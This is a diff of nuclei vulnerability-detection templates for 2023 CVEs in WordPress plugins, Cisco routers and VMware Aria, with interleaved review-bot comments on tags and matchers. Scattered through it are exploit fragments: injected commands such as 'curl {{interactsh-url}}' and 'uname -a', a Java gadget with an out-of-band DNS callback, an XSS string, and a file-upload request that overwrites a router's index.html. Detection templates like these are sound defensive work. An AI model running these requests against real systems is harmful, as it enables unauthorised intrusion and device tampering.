+++ b/nuclei-templates/CVE-2023/CVE-2023-1730.yaml @@ -6,18 +6,21 @@ info: severity: critical description: | The SupportCandy WordPress plugin before 3.1.5 does not validate and escape user input before using it in an SQL statement, which could allow unauthenticated attackers to perform SQL injection attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: Fixed in version 3.1.5 reference: - https://wpscan.com/vulnerability/44b51a56-ff05-4d50-9327-fc9bab74d4b7 - https://wordpress.org/plugins/supportcandy/ - https://nvd.nist.gov/vuln/detail/CVE-2023-1730 + - https://github.com/tanjiti/sec_profile classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-1730 cwe-id: CWE-89 - epss-score: 0.09522 - epss-percentile: 0.94153 + epss-score: 0.05497 + epss-percentile: 0.93034 cpe: cpe:2.3:a:supportcandy:supportcandy:*:*:*:*:*:wordpress:*:* metadata: verified: "true" @@ -25,7 +28,7 @@ info: vendor: supportcandy product: supportcandy framework: wordpress - tags: cve,cve2023,sqli,wpscan,wordpress,supportcandy,unauth + tags: cve2023,cve,sqli,wpscan,wordpress,supportcandy,unauth http: - raw: @@ -41,4 +44,4 @@ http: - 'status_code == 200' - 'contains(body, "supportcandy")' condition: and -# digest: 4a0a0047304502206aa4f0a81d24be8a215fcd7039564fbd30b4943f3f72cfc78c4902cce2446bc3022100de65c6f51e7031780455668d94a46252e88aff6e925284f882e9c411812669f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b8f43200f81783f187365c589653ad29a2050ba46a41782681ecc57fbfed6942022017518deb0c7150bec65b058cc0687e118acd14f0c54396df0e503dfb9ccdf33a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-1780.yaml b/nuclei-templates/CVE-2023/CVE-2023-1780.yaml index 441c3ddde7..f57c2fb70a 100644 
--- a/nuclei-templates/CVE-2023/CVE-2023-1780.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-1780.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-1780 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29557 + epss-percentile: 0.2903 cpe: cpe:2.3:a:codeermeneer:companion_sitemap_generator:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,7 +25,7 @@ info: product: companion_sitemap_generator framework: wordpress publicwww-query: "/wp-content/plugins/companion-sitemap-generator/" - tags: cve,cve2023,wpscan,wp,wordpress,wp-scan,xss,authenticated + tags: cve,cve2023,wpscan,wp,wordpress,wp-scan,xss,authenticated,codeermeneer http: - raw: @@ -47,4 +47,4 @@ http: - 'contains(body_2, "re not allowed to view")' - 'contains(body_2, "")' condition: and -# digest: 490a0046304402206fd9d7baedb494799d49ff9f084db87fb75d78c49f3dbcb3157e37ff9ee7959202200146bd8a2fa82e97fa2c716b1d4e374b088a32914c97d3088ee63a3cd972176d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022037fd184a30baa4bf9c5bead97935ec384efbce6d629f36e79fdc4a6f96c2a5d0022100fdeb0ca8f655e4f1856990096615ff0c35961dd2dea9984283364c1c0c9cc6ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-1835.yaml b/nuclei-templates/CVE-2023/CVE-2023-1835.yaml index 0d89153575..074ffba78d 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-1835.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-1835.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Ninja Forms before 3.6.22 is susceptible to cross-site scripting via the page parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of Ninja Forms (3.6.22 or higher) to mitigate this vulnerability. reference: @@ -18,7 +20,7 @@ info: cve-id: CVE-2023-1835 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29531 + epss-percentile: 0.29003 cpe: cpe:2.3:a:ninjaforms:ninja_forms:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +28,7 @@ info: vendor: ninjaforms product: ninja_forms framework: wordpress - tags: wpscan,cve,cve2023,ninja,forms,wp,wp-plugin,wordpress,authenticated,xss + tags: cve2023,cve,wpscan,ninja,forms,wp,wp-plugin,wordpress,authenticated,xss,ninjaforms http: - raw: @@ -48,4 +50,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "Ninja Forms")' condition: and -# digest: 490a00463044022065bf57c7be63f48bb60fbd02505ef95659fa4613bf50212dbdc995f26c268358022019265d4de3f3f453cdfbc8de37ea6797bcd4732fefc1bc08c39e01c1c29d5dfd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e5e7a1e57dcb12a58b14088fffc8b645c336e75e181bb9e86ad3afa2cd124f16022100b7094b86bf5ee74099a6da69ea87a76394fbb02765149b058c67daca7ac66a1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-1880.yaml b/nuclei-templates/CVE-2023/CVE-2023-1880.yaml index 8befbd3e3c..f4b580719f 100644 
--- a/nuclei-templates/CVE-2023/CVE-2023-1880.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-1880.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-1880 cwe-id: CWE-79 - epss-score: 0.00071 - epss-percentile: 0.29441 + epss-score: 0.00078 + epss-percentile: 0.3203 cpe: cpe:2.3:a:phpmyfaq:phpmyfaq:*:*:*:*:*:*:*:* metadata: verified: true @@ -25,7 +25,7 @@ info: vendor: phpmyfaq product: phpmyfaq shodan-query: http.html:"phpmyfaq" - tags: huntr,cve,cve2023,xss,phpmyfaq + tags: cve2023,cve,huntr,xss,phpmyfaq http: - method: GET @@ -39,4 +39,4 @@ http: - 'contains(body, "phpmyfaq") && contains(body, "")' - 'contains(content_type, "text/html")' condition: and -# digest: 490a00463044022075b0e4af7153d15048caacbf35d9f00b3f597daf2ac793a49634be966e4bd35f022069ccdecca051313adffe08f7a102948bf8d242b96b20a4a81356a82ecdeafe4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205b480a371ae035c47014eec72651c9396eb2f4cbb16cef0e087536bdb0401ade02203534bd6903549f0f9c3753092efb1d6cdf4adda76ba68f6fd7ab8557a659d271:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-1890.yaml b/nuclei-templates/CVE-2023/CVE-2023-1890.yaml index 414e2ff0ba..c1dba8bb95 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-1890.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-1890.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Tablesome before 1.0.9 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could lead to the execution of arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: Fixed in version 1.0.9. reference: - https://wpscan.com/vulnerability/8ef64490-30cd-4e07-9b7c-64f551944f3d @@ -16,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-1890 cwe-id: CWE-79 - epss-score: 0.00184 - epss-percentile: 0.55564 + epss-score: 0.00203 + epss-percentile: 0.57653 cpe: cpe:2.3:a:pauple:tablesome:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,7 +27,7 @@ info: vendor: pauple product: tablesome framework: wordpress - tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,authenticated,xss,tablesome + tags: cve2023,cve,wpscan,wp,wp-plugin,wordpress,authenticated,xss,tablesome,pauple http: - raw: @@ -47,4 +49,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "tablesome")' condition: and -# digest: 4a0a00473045022100f013326e96a290860357377b6f082d636e943a264753bd0c6fa4bc855c2166b50220123b808105be5f2d4feb5725a2b8d8051c9df39007e73fd771a92320b3e17cc1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d4ea7f06a84e16fe857d3fb6c8b915ddd7c277fa55d2b0b7341954486290763502202b6315a3b0fea762b9c94cf5ce30c251a14e7b0ac555ad55dad8d54b799b841d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-20073.yaml b/nuclei-templates/CVE-2023/CVE-2023-20073.yaml index c07bd7053b..53ca70e617 100644 
--- a/nuclei-templates/CVE-2023/CVE-2023-20073.yaml
+++ b/nuclei-templates/CVE-2023/CVE-2023-20073.yaml
@@ -1,23 +1,44 @@ id: CVE-2023-20073 info: - name: Cisco VPN Routers - Unauthenticated Arbitrary File Upload and Stored XSS + name: Cisco VPN Routers - Unauthenticated Arbitrary File Upload author: princechaddha,ritikchaddha severity: critical description: | A vulnerability in the web-based management interface of Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an unauthenticated, remote attacker to upload arbitrary files to an affected device. This vulnerability is due to insufficient authorization enforcement mechanisms in the context of file uploads. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to upload arbitrary files to the affected device. + impact: | + Successful exploitation of this vulnerability could lead to remote code execution or unauthorized access to sensitive information. + remediation: | + Apply the latest security patches provided by Cisco to mitigate this vulnerability. 
reference: - https://unsafe.sh/go-173464.html - https://gist.github.com/win3zz/076742a4e365b1bba7e2ba0ebea9253f - https://github.com/RegularITCat/CVE-2023-20073/tree/main - https://nvd.nist.gov/vuln/detail/CVE-2023-20073 + - https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-rv-afu-EXxwA65V + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-20073 + cwe-id: CWE-434 + epss-score: 0.38542 + epss-percentile: 0.97132 + cpe: cpe:2.3:o:cisco:rv340_firmware:*:*:*:*:*:*:*:* metadata: verified: true + max-request: 3 + vendor: cisco + product: rv340_firmware fofa-query: app="CISCO-RV340" || app="CISCO-RV340W" || app="CISCO-RV345" || app="CISCO-RV345P" - tags: cve,cve2023,xss,fileupload,cisco,unauth,routers,vpn,intrusive + tags: cve2023,cve,xss,fileupload,cisco,unauth,routers,vpn,intrusive +variables: + html_comment: "" # Random string as HTML comment to append in response body http: - raw: + - | + GET /index.html HTTP/1.1 + Host: {{Hostname}} - | POST /api/operations/ciscosb-file:form-file-upload HTTP/1.1 Host: {{Hostname}} 
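Review bot: The `html_comment` variable that the final matcher keys on is an empty string as this patch renders (`html_comment: ""`), and `contains(body, "")` holds for every response, so every reachable device would be reported vulnerable regardless of whether the upload landed. If the intended value was a randomised HTML comment that was stripped in rendering, confirm the committed file carries it, e.g. `html_comment: "<!-- {{randstr}} -->"`, since the template already relied on `{{randstr}}` before this change. The `xss` tag also survives in `tags:` although the name no longer mentions stored XSS; drop it or restore the qualifier. The raw requests this variable feeds continue in the next hunk.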
@@ -31,25 +52,32 @@ http: --------------------------f6f99e26f3a45adf Content-Disposition: form-data; name="fileparam" - login.html + index.html --------------------------f6f99e26f3a45adf Content-Disposition: form-data; name="file.path" - login.html + index.html --------------------------f6f99e26f3a45adf - Content-Disposition: form-data; name="file"; filename="login.html" + Content-Disposition: form-data; name="file"; filename="index.html" Content-Type: application/octet-stream - {{randstr}} + {{index}} + {{html_comment}} --------------------------f6f99e26f3a45adf-- - - | - GET /login.html HTTP/1.1 + GET /index.html HTTP/1.1 Host: {{Hostname}} + extractors: + - type: dsl + name: index + internal: true + dsl: + - body_1 matchers: - type: word - part: body_2 + part: body_3 words: - - "{{randstr}}" + - "{{html_comment}}" +# digest: 4a0a0047304502203543e37991008a86e6d6545f9b12ce7a9569148a72e2b69c5590d5a736a674cd022100c607440c608f5ca67437751859806a3700c511f68f54f71ac8f50a63b0335fea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-2009.yaml b/nuclei-templates/CVE-2023/CVE-2023-2009.yaml index 403ad4de04..4783e1fe8b 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-2009.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-2009.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-2009 cwe-id: CWE-79 epss-score: 0.00078 - epss-percentile: 0.32968 + epss-percentile: 0.3232 cpe: cpe:2.3:a:pretty_url_project:pretty_url:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -24,7 +24,7 @@ info: vendor: pretty_url_project product: pretty_url framework: wordpress - tags: cve,cve2023,wordpress,wpscan,wp-plugin,wp,authenticated,pretty-url,xss + tags: cve2023,cve,wordpress,wpscan,wp-plugin,wp,authenticated,pretty-url,xss,pretty_url_project http: - raw: 
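Review bot: The upload request writes `{{index}}` back to the device's `index.html` unconditionally, but nothing verifies that the pre-flight `GET /index.html` returned the real page — on a 3xx to the login page, a 4xx or an error body, `body_1` is that response and the router's landing page is overwritten with it, which the `intrusive` tag only partly signals. Nuclei cannot abort between requests here, so at minimum add `status_1 == 200` (and a check that `body_1` is non-empty) to the DSL before trusting the match, and record the restore caveat in a `notes:` field so operators know what was written. The `{{html_comment}}` appended after `{{index}}` is what the `body_3` matcher looks for; its value is defined in the preceding hunk.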
@@ -61,4 +61,4 @@ http: group: 1 regex: - 'name="_wpnonce" value="([0-9a-z]+)" />' -# digest: 490a0046304402201b0f8c7f577670e9269fb4a152d18da32ae10c7a077d7419661d5dc902e1bafb022062f8ed407a91316dac7afb032ce1648008ec5ae05ea32b01170b771a3ed0378e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008d6f1b11e38f9c8eefd91b79603bf5b7eb468702c923563b993e1ba8bc58a3e502203dfa0040b3fad85659dd26b3941e38eed7bd7a42b71ad9e85a926a7a37f318ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-20198.yaml b/nuclei-templates/CVE-2023/CVE-2023-20198.yaml index 70b0026e39..03ce03c97c 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-20198.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-20198.yaml @@ -22,8 +22,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2023-20198 - epss-score: 0.89074 - epss-percentile: 0.98434 + epss-score: 0.92151 + epss-percentile: 0.98755 cpe: cpe:2.3:o:cisco:ios_xe:*:*:*:*:*:*:*:* metadata: verified: true @@ -32,7 +32,7 @@ info: product: ios_xe shodan-query: http.html_hash:1076109428 note: this template confirms vulnerable host with limited unauthenticated command execution, this does not include admin user creation + arbitrary cmd execution. - tags: cve,cve2023,kev,cisco,rce,auth-bypass + tags: cve2023,cve,kev,cisco,rce,auth-bypass variables: cmd: uname -a @@ -61,4 +61,4 @@ http: group: 1 regex: - \n(.*)\[ -# digest: 4b0a00483046022100e9f5588343376a7fe8d1afee9bee342f5d6f14b054bb48120a0983d19cc9e75b022100b7250eef78b6aefa4226d087c21c0be95d6850fe747d0d87b59a27b2a2917100:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204b6c30a90e6cf37aa7916fdb2aa34c90e17498b711af7c429834fbea028f05810220647873d5d55dd1e9af9ad701d9f44d1cd41765c1ab655050cf34f6bf140499e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/nuclei-templates/CVE-2023/CVE-2023-2023.yaml b/nuclei-templates/CVE-2023/CVE-2023-2023.yaml index 1499989328..1f3d57af08 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-2023.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-2023.yaml @@ -6,18 +6,22 @@ info: severity: medium description: | Custom 404 Pro before 3.7.3 is susceptible to cross-site scripting via the search parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in version 3.7.3 reference: - https://wpscan.com/vulnerability/8859843a-a8c2-4f7a-8372-67049d6ea317 - https://wordpress.org/plugins/custom-404-pro/advanced/ - https://nvd.nist.gov/vuln/detail/CVE-2023-2023 + - https://github.com/GREENHAT7/pxplan + - https://github.com/thatformat/Hvv2023 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-2023 cwe-id: CWE-79 - epss-score: 0.00071 - epss-percentile: 0.29557 + epss-score: 0.00374 + epss-percentile: 0.722 cpe: cpe:2.3:a:kunalnagar:custom_404_pro:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,7 +29,7 @@ info: vendor: kunalnagar product: custom_404_pro framework: wordpress - tags: wpscan,cve,cve2023,xss,wordpress,wp-plugin,authenticated,custom-404-pro,intrusive + tags: cve2023,cve,wpscan,xss,wordpress,wp-plugin,authenticated,custom-404-pro,intrusive,kunalnagar http: - raw: 
@@ -47,4 +51,4 @@ http: - contains(body_2, "onanimationstart=alert(document.domain)//") - contains(body_2, "Custom 404 Pro") condition: and -# digest: 490a0046304402201f3151d15ebcfb41faa38b0894ce1209da712bd7d4e8f421e21f7fc73031f93802206fd0f4c1cbb1c66c23eed544b24c9d7d45e766922f7248d43ee2b01356371201:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cd38bff86e643f91db88d9a1590d35b1839285be73b6dbc31c8f0b1ad50f57020220594ae2e7d9f3dbf289a732848e92543eb02be8752b29df3f8de781957d536475:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-20864.yaml b/nuclei-templates/CVE-2023/CVE-2023-20864.yaml index d236eff926..98345d1968 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-20864.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-20864.yaml @@ -6,18 +6,21 @@ info: severity: critical description: | VMware Aria Operations for Logs contains a deserialization vulnerability. An unauthenticated, malicious actor with network access to VMware Aria Operations for Logs may be able to execute arbitrary code as root. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the necessary security patches or updates provided by VMware to mitigate this vulnerability. reference: - https://www.vmware.com/security/advisories/VMSA-2023-0007.html - https://nvd.nist.gov/vuln/detail/CVE-2023-20864 + - https://github.com/Threekiii/CVE classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-20864 cwe-id: CWE-502 - epss-score: 0.21157 - epss-percentile: 0.95924 + epss-score: 0.29094 + epss-percentile: 0.96766 cpe: cpe:2.3:a:vmware:aria_operations_for_logs:*:*:*:*:*:*:*:* metadata: verified: true 
@@ -25,7 +28,7 @@ info: vendor: vmware product: aria_operations_for_logs shodan-query: title:"vRealize Log Insight" - tags: cve,cve2023,vmware,aria,rce,oast + tags: cve2023,cve,vmware,aria,rce,oast http: - raw: @@ -60,4 +63,4 @@ http: internal: true kval: - "X_CSRF_Token" -# digest: 490a0046304402207d503c64579aa429be5b08a30ac186fffce881458eb002833f8766626ff4f8db02206ffdbbc34229c05dca9f7d8a8629dac9789ebb20634732b27a15edd570604a85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d81a1f67f8e41f50b8995bae686ab49b507ce0fa2517c60658b8ac8630d9871a022100def2a9f72d0bdacf1fba5cc1236dac40a103ff7edb620cff13fc41f501660326:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-20887.yaml b/nuclei-templates/CVE-2023/CVE-2023-20887.yaml index 0a9e20d502..5c4d6d49fd 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-20887.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-20887.yaml 
@@ -7,23 +7,32 @@ info: description: | VMWare Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a remote unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user. The RPC interface is protected by a reverse proxy which can be bypassed. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. A malicious actor can get remote code execution in the context of 'root' on the appliance. VMWare 6.x version are vulnerable. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. + remediation: | + Apply the latest security patches provided by VMware to mitigate this vulnerability. reference: - https://www.vmware.com/security/advisories/VMSA-2023-0012.html - https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/ - https://github.com/sinsinology/CVE-2023-20887 - - https://www.vmware.com/security/advisories/VMSA-2023-0012.html + - http://packetstormsecurity.com/files/173761/VMWare-Aria-Operations-For-Networks-Remote-Command-Execution.html + - https://github.com/ARPSyndicate/cvemon classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-20887 - epss-score: 0.00172 + cwe-id: CWE-77 + epss-score: 0.96408 + epss-percentile: 0.99538 + cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 + vendor: vmware + product: vrealize_network_insight shodan-query: title:"VMware vRealize Network Insight" fofa-query: title="VMware vRealize Network Insight" - tags: cve,cve2023,vmware,rce,msf,vrealize,insight,oast - + tags: 
cve2023,cve,packetstorm,vmware,rce,msf,vrealize,insight,oast,kev variables: cmd: "curl {{interactsh-url}}" @@ -48,13 +57,14 @@ http: words: - "application/x-thrift" - - type: status - status: - - 200 - - type: word part: body + negative: true words: - "Provided invalid node Id" - "Invalid nodeId" - negative: true + + - type: status + status: + - 200 +# digest: 4a0a00473045022100cef3e5e34cd635c23cf32fc104b9c643bc4b812046fc3e8ab1f2e0237b0c98c6022041d25ffbcfc8ed708d8e3cce28043e53ef71343b3a31238d065ba9f7e9d0f22a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-20888.yaml b/nuclei-templates/CVE-2023/CVE-2023-20888.yaml index 411a232b7a..861f3de03f 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-20888.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-20888.yaml 
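Review bot: The rewritten `tags:` line in the first hunk adds `kev` and `packetstorm` but not `intrusive`, even though the template's `cmd: "curl {{interactsh-url}}"` variable means a positive hit executes a command on the appliance; the CVE-2023-20889 hunk in this same commit does add `intrusive`, so the two templates are now tagged inconsistently. I would use `tags: cve2023,cve,packetstorm,vmware,rce,msf,vrealize,insight,oast,kev,intrusive` so that runs which exclude intrusive templates also skip this one. The swap of the negative word matcher and the status matcher in the second hunk looks behaviour-neutral, assuming the `matchers-condition` outside the hunk is still `and`.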
@@ -6,14 +6,28 @@ info: severity: high description: | Aria Operations for Networks contains an authenticated deserialization vulnerability. A malicious actor with network access to VMware Aria Operations for Networks and valid 'member' role credentials may be able to perform a deserialization attack resulting in remote code execution. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. + remediation: | + Apply the latest security patches or updates provided by VMware to mitigate this vulnerability. reference: - https://www.vmware.com/security/advisories/VMSA-2023-0012.html - https://nvd.nist.gov/vuln/detail/CVE-2023-20888 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 cve-id: CVE-2023-20888 + cwe-id: CWE-502 + epss-score: 0.35911 + epss-percentile: 0.96766 + cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:* metadata: verified: true - tags: cve,cve2023,vmware,aria,rce,authenticated,oast + max-request: 2 + vendor: vmware + product: vrealize_network_insight + shodan-query: title:"VMware Aria Operations" + tags: cve2023,cve,vmware,aria,rce,authenticated,oast http: - raw: @@ -24,7 +38,6 @@ http: X-Vrni-Csrf-Token: null {"username":"{{username}}","password":"{{password}}","domain":"localdomain"} - - | POST /api/events/push-notifications HTTP/2 Host: {{Hostname}} @@ -33,7 +46,6 @@ http: {"endOffset": "{{ generate_java_gadget("dns", "http://{{interactsh-url}}", "base64") }} "} - cookie-reuse: true matchers-condition: and matchers: - type: word @@ -48,8 +60,9 @@ http: extractors: - type: regex name: csrf - part: body group: 1 regex: - 'csrfToken":"([a-z0-9A-Z/+=]+)"' internal: true + part: body +# digest: 4a0a00473045022100fe3fd06bbd0a82bf33a0611564f97011c559e4cb49524a0a37df553c037ab05f02205cd1eae8785402529378a446c8007225d04aa7f647bb94f439d1b8dc33ab27db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
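Review bot: The added `epss-percentile: 0.96766` is byte-identical to the percentile the CVE-2023-20864 hunk sets, while the two `epss-score` values differ (0.35911 here, 0.29094 there); values from the same EPSS snapshot are monotonic, so one of the two percentiles looks copied and should be re-pulled from the feed. The added `shodan-query: title:"VMware Aria Operations"` is also broader than the product in the new `cpe:` line (vrealize_network_insight) and will return Aria Operations for Logs hosts as well — presumably intended, but a narrower title would cut noise. The relocation of `part: body` in the last hunk is cosmetic.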
diff --git a/nuclei-templates/CVE-2023/CVE-2023-20889.yaml b/nuclei-templates/CVE-2023/CVE-2023-20889.yaml index c960a8bb7f..03cddd74fc 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-20889.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-20889.yaml @@ -1,22 +1,36 @@ id: CVE-2023-20889 info: - name: VMware Aria Operations for Networks - Command Injection/Information Disclosure + name: VMware Aria Operations for Networks - Code Injection Information Disclosure Vulnerability author: iamnoooob,rootxharsh,pdresearch severity: high description: | Aria Operations for Networks contains an information disclosure vulnerability. A malicious actor with network access to VMware Aria Operations for Networks may be able to perform a command injection attack resulting in information disclosure. + impact: | + Successful exploitation of this vulnerability can result in unauthorized access to sensitive information. + remediation: | + Apply the latest security patches provided by VMware to mitigate this vulnerability. reference: + - https://www.zerodayinitiative.com/advisories/ZDI-23-842/ - https://www.vmware.com/security/advisories/VMSA-2023-0012.html - https://nvd.nist.gov/vuln/detail/CVE-2023-20889 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 cve-id: CVE-2023-20889 + cwe-id: CWE-77 + epss-score: 0.09004 + epss-percentile: 0.94043 + cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:* metadata: verified: true - tags: cve,cve2023,vmware,aria,disclosure,authenticated - + max-request: 2 + vendor: vmware + product: vrealize_network_insight + shodan-query: title:"VMware Aria Operations" + tags: cve2023,cve,vmware,aria,disclosure,authenticated,rce,oast,intrusive variables: - payload: "location='http://{{interactsh-url}}'" + payload: location='http://{{interactsh-url}}' http: - raw: 
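Review bot: The new `tags:` line adds `rce`, but the template's own `name`, its `description` and the added `cvss-metrics` (`C:H/I:N/A:N`) all describe information disclosure, so the tag contradicts the metadata it sits beside. Keep `oast` and `intrusive` and drop `rce`: `tags: cve2023,cve,vmware,aria,disclosure,authenticated,oast,intrusive`. Removing the quotes in `payload: location='http://{{interactsh-url}}'` is valid as a YAML plain scalar, but the quoted form was unambiguous and is what the other `variables:` block in this commit uses (`cmd: "curl {{interactsh-url}}"`), so I would leave the quoting alone.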
@@ -27,7 +41,6 @@ http: X-Vrni-Csrf-Token: null {"username":"{{username}}","password":"{{password}}","domain":"localdomain"} - - | POST /api/pdfexport HTTP/2 Host: {{Hostname}} @@ -48,7 +61,6 @@ http: ------WebKitFormBoundaryFkpSYDWZ5w9YNjmh-- - cookie-reuse: true matchers-condition: and matchers: - type: word @@ -58,9 +70,9 @@ http: - http - type: word - part: header + part: header_2 words: - - 'application/octet-stream' + - application/octet-stream - type: status status: @@ -69,8 +81,9 @@ http: extractors: - type: regex name: csrf - part: body group: 1 regex: - - 'csrfToken":"([a-z0-9A-Z/+=]+)"' + - csrfToken":"([a-z0-9A-Z/+=]+)" internal: true + part: body +# digest: 4a0a004730450221008a1f0e02f6eac19878f28e73d5af976689cb0985da1e466a9ec0ec62c50c490002205fb72bf2476805961a6bb628582a35b82e6ae23650edd78967e82247099c3308:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-2122.yaml b/nuclei-templates/CVE-2023/CVE-2023-2122.yaml index 0cd296f0df..3ef490f294 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-2122.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-2122.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-2122 cwe-id: CWE-79 